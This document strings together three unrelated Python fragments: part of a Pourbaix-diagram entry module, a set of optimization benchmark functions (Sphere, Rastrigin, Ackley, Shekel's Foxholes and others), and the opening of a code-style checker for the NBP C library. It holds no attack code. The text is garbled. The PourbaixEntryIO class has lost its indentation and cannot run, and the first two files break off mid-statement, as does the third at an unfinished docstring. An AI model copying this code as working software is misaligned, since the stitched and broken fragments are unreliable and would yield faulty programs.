        d["energy"] = self.energy
        d["correction"] = self.correction
        d["entry_id"] = self.entry_id
        return d
    @classmethod
    def from_dict(cls, d):
        """
        Returns a PourbaixEntry by reading in an Ion
        """
        entry_type = d["entry type"]
        if entry_type == "Ion":
            entry = IonEntry.from_dict(d["entry"])
        else:
            entry = PDEntry.from_dict(d["entry"])
        correction = d["correction"]
        entry_id = d["entry_id"]
        return PourbaixEntry(entry, correction, entry_id)
    def _calc_coeff_terms(self):
        """
        Calculates coefficients of pH, V, H2O
        """
        nH = 0
        nO = 0
        nM = 0
        for elt in self._entry.composition.elements:
            if elt == (Element("H")):
                nH = self.entry.composition[elt]
            elif elt == (Element("O")):
                nO = self.entry.composition[elt]
            else:
                # Everything that is not H or O counts toward the
                # "metal"/framework atom total used for normalization.
                nM += self.entry.composition[elt]
        self._nM = nM
        self._npH = (nH - 2 * nO)
        self._nH2O = nO
        self._nPhi = (nH - 2 * nO - self._charge)
    @property
    def normalization_factor(self):
        """
        Normalize each entry by nM
        """
        # NOTE(review): raises ZeroDivisionError when the composition has
        # no non-H/O elements (nM == 0) — confirm callers never pass those.
        fact = 1.0 / self._nM
        return fact
    def scale(self, factor):
        """
        Normalize all entries by normalization factor.
        Args:
            factor:
                Normalization factor
        """
        # Energies and coefficients scale together so the free-energy
        # expression remains consistent.
        self._npH *= factor
        self._nPhi *= factor
        self._nH2O *= factor
        self.uncorrected_energy *= factor
        self.correction *= factor
    def normalize(self, factor):
        # Alias of scale(); kept for backward compatibility.
        self.scale(factor)
    @property
    def charge(self):
        """
        Returns charge of entry
        """
        return self._charge
    @property
    def composition(self):
        """
        Returns composition
        """
        return self.entry.composition
    @property
    def entry(self):
        """
        Returns IonEntry/PDEntry object
        """
        return self._entry
    def reduced_entry(self):
        """
        Calculate reduction factor for composition, and reduce parameters by
        this factor. Mutates this entry in place.
        """
        reduction_factor = self.entry.composition.\
            get_reduced_composition_and_factor()[1]
        self._nM /= reduction_factor
        self.scale(1.0 / reduction_factor)
    @property
    def num_atoms(self):
        """
        Return number of atoms in current formula. Useful for normalization
        """
        return self.entry.composition.num_atoms\
            / self.entry.composition.get_reduced_composition_and_factor()[1]
    def set_conc(self, conc):
        """
        Set concentration manually.
        Args:
            conc:
                Input concentration
        """
        self._conc = conc
    def __repr__(self):
        return "Pourbaix Entry : {} with energy = {:.4f}, npH = {}, nPhi = {},\
            nH2O = {}".format(self._entry.composition, self.g0, self.npH,
                              self.nPhi, self.nH2O)
    def __str__(self):
        return self.__repr__()
class MultiEntry(PourbaixEntry):
    """
    PourbaixEntry-like object for constructing multi-elemental Pourbaix
    diagrams. Aggregates several component PourbaixEntries: every energy
    and coefficient term is the weighted sum of the component values.
    """
    def __init__(self, entry_list, weights=None):
        """
        Args:
            entry_list:
                List of component PourbaixEntries
            weights:
                Weights associated with each entry. Default is None,
                which assigns a weight of 1.0 to every entry.
        """
        if weights is None:
            self._weights = [1.0] * len(entry_list)
        else:
            self._weights = weights
        self._entrylist = entry_list
        self.correction = 0.0
        self.uncorrected_energy = 0.0
        self._npH = 0.0
        self._nPhi = 0.0
        self._nH2O = 0.0
        self._nM = 0.0
        self.entry_id = []
        names = []
        # Accumulate the weighted contribution of each component entry.
        # (zip replaces the py2-only xrange index loop of the original.)
        for weight, entry in zip(self._weights, entry_list):
            self.uncorrected_energy += weight * entry.uncorrected_energy
            self.correction += weight * entry.correction
            self._npH += weight * entry.npH
            self._nPhi += weight * entry.nPhi
            self._nH2O += weight * entry.nH2O
            self._nM += weight * entry._nM
            names.append(entry.name)
            self.entry_id.append(entry.entry_id)
        # str.join avoids the quadratic "+= ... then strip" idiom.
        self._name = " + ".join(names)
    @property
    def normalization_factor(self):
        """
        Normalize by the weighted count of non-O/H atoms across all
        component entries.
        """
        norm_fac = 0.0
        for weight, entry in zip(self._weights, self._entrylist):
            for el in entry.composition.elements:
                # H and O are handled by the pH / H2O terms and do not
                # count toward the normalization.
                if el == Element("O") or el == Element("H"):
                    continue
                if entry._phase_type == 'Solid':
                    red_fac = entry.composition.\
                        get_reduced_composition_and_factor()[1]
                else:
                    red_fac = 1.0
                norm_fac += weight * entry.composition[el] / red_fac
        return 1.0 / norm_fac
    def __repr__(self):
        # Original shadowed the builtin ``str`` with a local variable;
        # renamed to keep the builtin usable.
        species = " + ".join(entry.name for entry in self._entrylist)
        return ("Multiple Pourbaix Entry : with energy = {:.4f}, npH = {}, "
                "nPhi = {}, nH2O = {}, species: {}".format(
                    self.g0, self.npH, self.nPhi, self.nH2O, species))
    def __str__(self):
        return self.__repr__()
    @property
    def conc_term(self):
        """
        Weighted concentration contribution to the free energy.
        """
        sum_conc = 0.0
        for weight, entry in zip(self._weights, self._entrylist):
            sum_conc += weight * PREFAC * math.log10(entry.conc)
        return sum_conc * self.normalization_factor
    @property
    def entrylist(self):
        """
        Returns the list of component PourbaixEntries.
        """
        return self._entrylist
class IonEntry(PDEntry):
    """
    Object similar to PDEntry, but contains an Ion object instead of a
    Composition object.
    .. attribute:: name
    A name for the entry, shown in phase diagrams. Defaults to the reduced
    formula of the ion but may be set to any display string.
    """
    def __init__(self, ion, energy, name=None):
        """
        Args:
            ion:
                Ion object for this entry.
            energy:
                Energy of the ion.
            name:
                Optional display name; defaults to the ion's reduced
                formula when omitted.
        """
        self._energy = energy
        self._composition = ion
        if name:
            self.name = name
        else:
            self.name = self._composition.reduced_formula
    @classmethod
    def from_dict(cls, d):
        """
        Reconstructs an IonEntry from its dict representation.
        """
        return IonEntry(Ion.from_dict(d["composition"]), d["energy"])
    @property
    def to_dict(self):
        """
        Dict representation holding the ion composition and the energy.
        """
        return {"composition": self._composition.to_dict,
                "energy": self._energy}
    @property
    def energy(self):
        """
        Return final energy
        """
        return self._energy
    @property
    def energy_per_atom(self):
        """
        Return final energy per atom
        """
        return self.energy / self.composition.num_atoms
    @property
    def composition(self):
        """
        Returns the composition
        """
        return self._composition
    def __repr__(self):
        return "IonEntry : {} with energy = {:.4f}".format(
            self.composition, self.energy)
    def __str__(self):
        return self.__repr__()
class PourbaixEntryIO(object):
"""
Class to import and export Pourbaix entries from a csv file
"""
@staticmethod
def to_csv(filename, entries, latexify_names=False):
"""
Exports Pourbaix entries to a csv
Args:
filename:
Filename to write to.
entries:
Entries to export.
latexify_names:
Format entry names to be LaTex compatible, e.g., Li_{2}O
"""
import csv
elements = set()
map(elements.update, [entry.entry.composition.elements
for entry in entries])
elements = sorted(list(elements), key=lambda a: a.X)
writer = csv.writer(open(filename, "wb"), delimiter=",",
quotechar="\"", quoting=csv.QUOTE_MINIMAL)
writer.writerow(["Name"] + elements + ["Energy"] + ["Entry Type"]
+ ["Charge"] + ["Concentration"])
for entry in entries:
row = [entry.name if not latexify_names
else re.sub(r"([0-9]+)", r"_{\1}", entry.name)]
if entry.phase_type == "Solid":
reduction_fac = entry.entry.composition.\
get_reduced_composition_and_factor()[1]
else:
reduction_fac = 1.0
row.extend([entry.entry.composition[el] / reduction_fac
for el in elements])
if entry.phase_type == | |
<gh_stars>1-10
import numpy as np
import math
def prod(it):
    """Multiply together every element of *it*; an empty iterable yields 1."""
    result = 1
    for factor in it:
        result = result * factor
    return result
def Ufun(x, a, k, m):
    """Elementwise penalty: k*(x-a)^m outside +a, k*(-x-a)^m outside -a, else 0."""
    above = k * ((x - a) ** m) * (x > a)
    below = k * ((-x - a) ** m) * (x < (-a))
    return above + below
class F1:
    """Sphere benchmark: f(x) = sum(x_i^2), minimum 0 at the origin."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -100
        self.high = 100
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Evaluate the sphere function at point x (numpy array)."""
        return np.sum(np.square(x))
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F2:
    """Schwefel 2.22 benchmark: f(x) = sum(|x_i|) + prod(|x_i|), minimum 0."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -10
        self.high = 10
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Sum of absolute values plus product of absolute values."""
        magnitudes = abs(x)
        return sum(magnitudes) + prod(magnitudes)
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F3:
    """Schwefel 1.2 benchmark: f(x) = sum_i (sum of the first i components)^2."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -100
        self.high = 100
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Sum over i of the squared cumulative prefix sums of x."""
        total = 0
        for i in range(1, len(x) + 1):
            total = total + (np.sum(x[0:i])) ** 2
        return total
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F4:
    """Schwefel 2.21 benchmark: f(x) = max_i |x_i|, minimum 0 at the origin."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -100
        self.high = 100
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Largest absolute component of x."""
        return abs(x).max()
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F5:
    """Rosenbrock benchmark: minimum 0 at x = (1, ..., 1)."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -30
        self.high = 30
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Classic banana-valley sum over consecutive component pairs."""
        head = x[:-1]
        tail = x[1:]
        return np.sum(100 * (tail - head ** 2) ** 2 + (head - 1) ** 2)
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F6:
    """Shifted-square benchmark as implemented here: f(x) = sum(|x + 0.5|^2).

    NOTE(review): the classical Step benchmark squares floor(x + 0.5); this
    implementation squares the shifted value directly — confirm intended.
    """
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -100
        self.high = 100
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Sum of squared shifted components."""
        return np.sum(abs(x + 0.5) ** 2)
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F7:
    """Quartic benchmark with noise: f(x) = sum(i * x_i^4) + U(0, 1)."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -1.28
        self.high = 1.28
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Index-weighted quartic sum plus uniform random noise in [0, 1)."""
        weights = np.asarray([i + 1 for i in range(len(x))])
        return np.sum(weights * (x ** 4)) + np.random.uniform(0, 1)
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value (noise-free part)."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F8:
    """Schwefel 2.26 benchmark: f(x) = sum(-x_i * sin(sqrt(|x_i|)))."""
    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -500
        self.high = 500
        # Literature optimum for 30 dimensions.
        self.global_optimum_solution = -12569.5
    def get_func_val(self, x):
        """Sum of per-component sine-modulated terms."""
        contributions = -x * (np.sin(np.sqrt(abs(x))))
        return sum(contributions)
    def get_search_range(self):
        """Return a (2, dimensions) array: row 0 upper bounds, row 1 lower bounds."""
        upper = np.asarray([self.high] * self.dimensions)
        lower = np.asarray([self.low] * self.dimensions)
        return np.asarray([upper, lower])
    def get_global_optimum_solution(self):
        """Known optimal objective value."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Number of decision variables."""
        return self.dimensions
class F9:
    """Rastrigin benchmark on [-5.12, 5.12]^n.

    f(x) = sum_i (x_i^2 - 10 cos(2 pi x_i)) + 10 n; stored optimum is 0.
    """

    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -5.12
        self.high = 5.12
        self.global_optimum_solution = 0

    def get_func_val(self, x):
        """Evaluate the Rastrigin sum at point x (1-D numpy array)."""
        n = len(x)
        return np.sum(x ** 2 - 10 * np.cos(2 * math.pi * x)) + 10 * n

    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        highs = np.asarray([self.high] * self.dimensions)
        lows = np.asarray([self.low] * self.dimensions)
        return np.asarray([highs, lows])

    def get_global_optimum_solution(self):
        """Return the stored reference optimum value."""
        return self.global_optimum_solution

    def get_dimensions(self):
        """Return the number of decision variables."""
        return self.dimensions
class F10:
    """Ackley benchmark on [-32, 32]^n; stored reference optimum is 0."""

    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -32
        self.high = 32
        self.global_optimum_solution = 0

    def get_func_val(self, x):
        """Evaluate the Ackley function at point x (1-D numpy array)."""
        n = len(x)
        rms_term = -20 * np.exp(-0.2 * np.sqrt(np.sum(x ** 2) / n))
        cos_term = -np.exp(np.sum(np.cos(2 * math.pi * x)) / n)
        return rms_term + cos_term + 20 + np.exp(1)

    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        highs = np.asarray([self.high] * self.dimensions)
        lows = np.asarray([self.low] * self.dimensions)
        return np.asarray([highs, lows])

    def get_global_optimum_solution(self):
        """Return the stored reference optimum value."""
        return self.global_optimum_solution

    def get_dimensions(self):
        """Return the number of decision variables."""
        return self.dimensions
class F11:
    """Griewank benchmark on [-600, 600]^n; stored reference optimum is 0.

    Uses the module-level `prod` helper for the cosine product term.
    """

    def __init__(self, num_dimensions):
        self.dimensions = num_dimensions
        self.low = -600
        self.high = 600
        self.global_optimum_solution = 0

    def get_func_val(self, x):
        """Evaluate the Griewank function at point x (1-D numpy array)."""
        idx = [k + 1 for k in range(len(x))]
        return np.sum(x ** 2) / 4000 - prod(np.cos(x / np.sqrt(idx))) + 1

    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        highs = np.asarray([self.high] * self.dimensions)
        lows = np.asarray([self.low] * self.dimensions)
        return np.asarray([highs, lows])

    def get_global_optimum_solution(self):
        """Return the stored reference optimum value."""
        return self.global_optimum_solution

    def get_dimensions(self):
        """Return the number of decision variables."""
        return self.dimensions
class F12:
    # Generalized penalized benchmark function no. 1 on [-50, 50]^n.
    # Relies on the penalty helper `Ufun`, defined elsewhere in this module.
    def __init__(self, num_dimensions):
        """Configure an n-dimensional instance with bounds [-50, 50]."""
        self.dimensions = num_dimensions
        self.low = -50
        self.high = 50
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Evaluate the penalized sum at point x (1-D array of length n).

        Implicitly uses the substitution y_i = 1 + (x_i + 1) / 4 and adds
        the out-of-bounds penalty term sum(Ufun(x, 10, 100, 4)).
        NOTE(review): `Ufun`'s exact semantics are not visible here —
        presumably the standard u(x, a, k, m) boundary penalty; confirm.
        """
        dim = len(x)
        o = (math.pi / dim) * (
            10 * ((np.sin(math.pi * (1 + (x[0] + 1) / 4))) ** 2)
            + np.sum(
                (((x[: dim - 1] + 1) / 4) ** 2)
                * (1 + 10 * ((np.sin(math.pi * (1 + (x[1 :] + 1) / 4)))) ** 2)
            )
            + ((x[dim - 1] + 1) / 4) ** 2
        ) + np.sum(Ufun(x, 10, 100, 4))
        return o
    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        lows = np.asarray([self.low for i in range(self.dimensions)])
        highs = np.asarray([self.high for i in range(self.dimensions)])
        arrs = [highs, lows]
        return np.asarray(arrs)
    def get_global_optimum_solution(self):
        """Return the stored reference optimum value (0)."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Return the number of decision variables."""
        return self.dimensions
class F13:
    # Generalized penalized benchmark function no. 2 on [-50, 50]^n.
    # Relies on the penalty helper `Ufun`, defined elsewhere in this module.
    def __init__(self, num_dimensions):
        """Configure an n-dimensional instance with bounds [-50, 50]."""
        self.dimensions = num_dimensions
        self.low = -50
        self.high = 50
        self.global_optimum_solution = 0
    def get_func_val(self, x):
        """Evaluate the function for a single point or a batch of points.

        A 1-D input is promoted to shape (1, n); the main term is reduced
        row-wise (axis=1), yielding one value per input row.
        NOTE(review): the penalty np.sum(Ufun(x, 5, 100, 4)) is reduced
        over ALL elements (no axis argument), so with a batch input the
        same pooled penalty is added to every row — verify this is the
        intended batched behavior.
        """
        if x.ndim==1:
            x = x.reshape(1,-1)
        o = 0.1 * (
            (np.sin(3 * np.pi * x[:,0])) ** 2
            + np.sum(
                (x[:,:-1] - 1) ** 2
                * (1 + (np.sin(3 * np.pi * x[:,1:])) ** 2), axis=1
            )
            + ((x[:,-1] - 1) ** 2) * (1 + (np.sin(2 * np.pi * x[:,-1])) ** 2)
        ) + np.sum(Ufun(x, 5, 100, 4))
        return o
    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        lows = np.asarray([self.low for i in range(self.dimensions)])
        highs = np.asarray([self.high for i in range(self.dimensions)])
        arrs = [highs, lows]
        return np.asarray(arrs)
    def get_global_optimum_solution(self):
        """Return the stored reference optimum value (0)."""
        return self.global_optimum_solution
    def get_dimensions(self):
        """Return the number of decision variables."""
        return self.dimensions
class F14:
    """Shekel's Foxholes (De Jong F5): fixed 2-D multimodal benchmark.

    The 25 "foxholes" sit on a 5x5 lattice with coordinates drawn from
    {-32, -16, 0, 16, 32}. The best value (~0.998) is reached near
    (-32, -32); the stored reference optimum attribute is 1.
    """

    def __init__(self):
        self.dimensions = 2
        self.low = -65.536
        self.high = 65.536
        self.global_optimum_solution = 1

    def get_func_val(self, x):
        """Evaluate the function at a 2-D point x.

        Returns ((1/500) + sum_j 1/(j + b_j))^-1 where b_j is the
        sixth-power distance term to foxhole j, with j running 1..25.
        """
        base = [-32, -16, 0, 16, 32]
        # Foxhole centres: row 0 cycles through `base` five times, row 1
        # repeats each value five times — together all 25 lattice points.
        aS = np.asarray([base * 5, [v for v in base for _ in range(5)]])
        pt = np.asarray(x, dtype=float).reshape(2)
        # Sixth-power "distance" to every foxhole, vectorized over the 25
        # columns (replaces the original np.matrix loop; np.matrix is
        # deprecated).
        bS = np.sum((pt[:, None] - aS) ** 6, axis=0)
        # Bug fix: the original loop `for i in range(0, 24)` filled only
        # w[0..23] with 1..24 and left w[24] at its initial value 24,
        # duplicating weight 24 instead of using 25. Weights are 1..25.
        w = np.arange(1, 26)
        return ((1.0 / 500) + np.sum(1.0 / (w + bS))) ** (-1)

    def get_search_range(self):
        """Return a (2, dimensions) array whose rows are [highs, lows]."""
        highs = np.asarray([self.high for i in range(self.dimensions)])
        lows = np.asarray([self.low for i in range(self.dimensions)])
        return np.asarray([highs, lows])

    def get_global_optimum_solution(self):
        """Return the stored reference optimum value (1)."""
        return self.global_optimum_solution

    def get_dimensions(self):
        """Return the number of decision variables (always 2)."""
        return self.dimensions
class F15:
def __init__(self):
self.dimensions = 4
self.low = -5
self.high = 5
self.global_optimum_solution = 0.0003075
def get_func_val(self, L):
aK = [
0.1957, 0.1947, 0.1735, 0.16, 0.0844, 0.0627,
0.0456, 0.0342, 0.0323, 0.0235, 0.0246,
]
bK = [0.25, 0.5, 1, 2, 4, 6, 8, 10, 12, 14, 16]
aK = np.asarray(aK)
bK = np.asarray(bK)
bK = 1 / bK
fit = np.sum(
(aK - ((L[0] * (bK ** 2 + L[1] * bK)) / (bK ** 2 + L[2] * bK + L[3]))) ** | |
# No Bugs in Production (NBP) Library
# https://github.com/aenachescu/nbplib
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
# SPDX-License-Identifier: MIT
# Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
from queue import LifoQueue
from inflection import *
# Files whose on-disk name may differ from the snake_case form that
# check_filename() would otherwise require.
filenameExceptions = [
    "CODE_OF_CONDUCT.md",
    "LICENSE",
    "README.md",
    "build/CMakeLists.txt",
    ".clang-format"
]
# Files exempt from the 80-character limit enforced by check_line_length().
fileLengthExceptions = [
    "README.md",
    ".travis.yml",
    "CODE_OF_CONDUCT.md"
]
# Files exempt from the 4-space indenting rule enforced by check_indenting().
fileIndentingExceptions = [
    "CODE_OF_CONDUCT.md",
    ".travis.yml"
]
# Files not required to carry the license header (check_file_license()).
fileLicenseExceptions = [
    ".clang-format",
    "README.md",
    "LICENSE",
    ".gitignore",
    "CODE_OF_CONDUCT.md",
    "docs/coding_standard.md",
    "build/CMakeLists.txt",
    "build/test_config.cmake",
    ".vscode/settings.json",
    ".vscode/c_cpp_properties.json"
]
# Expected license header for '#'-commented files (scripts, YAML, etc.),
# one list element per expected file line. Adjacent string literals are
# implicitly concatenated, so long header lines are split across two
# source lines here but still compare against ONE file line.
sharpLicense = [
    "# No Bugs in Production (NBP) Library",
    "# https://github.com/aenachescu/nbplib",
    "#",
    "# Licensed under the MIT License <http://opensource.org/licenses/MIT>.",
    "# SPDX-License-Identifier: MIT",
    "# Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>",
    "#",
    "# Permission is hereby granted, free of charge, to any person obtaining "
    "a copy",
    "# of this software and associated documentation files (the \"Software\"), "
    "to deal",
    "# in the Software without restriction, including without limitation the "
    "rights",
    "# to use, copy, modify, merge, publish, distribute, sublicense, and/or "
    "sell",
    "# copies of the Software, and to permit persons to whom the Software is",
    "# furnished to do so, subject to the following conditions:",
    "#",
    "# The above copyright notice and this permission notice shall be included "
    "in all",
    "# copies or substantial portions of the Software.",
    "#",
    "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, "
    "EXPRESS OR",
    "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF "
    "MERCHANTABILITY,",
    "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL "
    "THE",
    "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER",
    "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING "
    "FROM,",
    "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS "
    "IN THE",
    "# SOFTWARE.",
    ""
]
# Expected license header for C-style files using a /* ... */ block comment;
# same element-per-line convention as sharpLicense.
blockLicense = [
    "/*",
    "No Bugs in Production (NBP) Library",
    "https://github.com/aenachescu/nbplib",
    "",
    "Licensed under the MIT License <http://opensource.org/licenses/MIT>.",
    "SPDX-License-Identifier: MIT",
    "Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>",
    "",
    "Permission is hereby granted, free of charge, to any person obtaining a "
    "copy",
    "of this software and associated documentation files (the \"Software\"), "
    "to deal",
    "in the Software without restriction, including without limitation the "
    "rights",
    "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell",
    "copies of the Software, and to permit persons to whom the Software is",
    "furnished to do so, subject to the following conditions:",
    "",
    "The above copyright notice and this permission notice shall be included "
    "in all",
    "copies or substantial portions of the Software.",
    "",
    "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, "
    "EXPRESS OR",
    "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,",
    "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL "
    "THE",
    "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER",
    "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING "
    "FROM,",
    "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS "
    "IN THE",
    "SOFTWARE.",
    "*/",
    ""
]
# Absolute path of the project root; populated by init_globals() and read
# by every check_* function below.
projectPath = ""
def init_globals(projPath):
    """Store the project root path used by all subsequent file checks."""
    global projectPath
    projectPath = projPath
def check_filename(log, filePath):
    """
    Verify that filePath lives under the project root and that its
    project-relative path is already snake_case (per inflection's
    underscore()), unless it is whitelisted in filenameExceptions.

    Returns True when the name is acceptable, False otherwise.
    """
    log.info("Checking file path... [%s]", filePath)
    if not filePath.startswith(projectPath):
        log.error(
            "File is not in project path. File = [%s]. Project path = [%s]",
            filePath,
            projectPath
        )
        return False
    filePathRelative = filePath[len(projectPath):]
    expectedPath = underscore(filePathRelative)
    if expectedPath == filePathRelative:
        log.info("File has valid name: [%s]", filePath)
        return True
    if filePathRelative in filenameExceptions:
        log.info(
            "Invalid filename, but it is in exception list."
            " Expected = [%s]. Actual = [%s]",
            expectedPath,
            filePathRelative
        )
        return True
    log.error(
        "Invalid filename. Expected = [%s]. Actual = [%s]",
        expectedPath,
        filePathRelative
    )
    return False
def check_eol_sequence(log, filePath, fileContent):
    """Return True when fileContent (bytes) contains no CRLF sequence."""
    log.info("Checking EOL sequence... [%s]", filePath)
    if b'\r\n' in fileContent:
        log.error("File has CRLF sequence: [%s]", filePath)
        return False
    log.info("File has the right EOL sequence: [%s]", filePath)
    return True
def check_tabs(log, filePath, fileLines):
    """
    Check that no line of the file contains a tab character.

    Every offending line/column is logged. Returns True only when the
    file is completely tab-free.
    """
    log.info("Checking if file has tabs... [%s]", filePath)
    status = True
    lineId = 0
    for l in fileLines:
        lineId += 1
        pos = l.find('\t')
        if pos != -1:
            log.error(
                "Found tab. File = [%s]. Line = %d. Column = %d",
                filePath,
                lineId,
                pos + 1
            )
            status = False
    if status:
        log.info("File has no tabs: [%s]", filePath)
    # Bug fix: the old code returned `status` only inside `if status:` and
    # then fell through to `return True`, so files WITH tabs passed the
    # check. Always return the accumulated status.
    return status
def check_space_before_eol(log, filePath, fileLines):
    """
    Return True when no line of the file ends with a space character;
    every offending line number is logged.
    """
    log.info(
        "Checking if file has space characters before eol... [%s]",
        filePath
    )
    status = True
    for lineId, line in enumerate(fileLines, start=1):
        if not line.endswith(" "):
            continue
        log.error(
            "Found space before eol. File = [%s]. Line = %d",
            filePath,
            lineId
        )
        status = False
    if status:
        log.info("File has no space before eol: [%s]", filePath)
    return status
def check_line_length(log, filePath, fileLines):
    """
    Return True when no line exceeds 80 characters. Files listed in
    fileLengthExceptions have over-long lines logged but tolerated.
    """
    log.info("Checking line length... [%s]", filePath)
    status = True
    filePathRelative = filePath[len(projectPath):]
    for lineId, line in enumerate(fileLines, start=1):
        if len(line) <= 80:
            continue
        if filePathRelative in fileLengthExceptions:
            log.info(
                "Found line longer than 80 character but file is in "
                "exception list. File = [%s]. Line = %d",
                filePath,
                lineId
            )
            continue
        log.error(
            "Found line longer than 80 characters. File = [%s]. Line = %d",
            filePath,
            lineId
        )
        status = False
    if status:
        log.info("File has no line longer than 80 characters: [%s]", filePath)
    return status
def check_new_line_before_eof(log, filePath, fileContent):
    """Return True when the raw content (bytes) ends with a newline."""
    log.info("Checking if there is new line before eof... [%s]", filePath)
    if fileContent.endswith(b'\n'):
        log.info("File has new line before eof: [%s]", filePath)
        return True
    log.error("File has not new line before eof: [%s]", filePath)
    return False
def check_indenting(log, filePath, fileLines):
    """
    Check that every line's leading-space count is a multiple of 4.

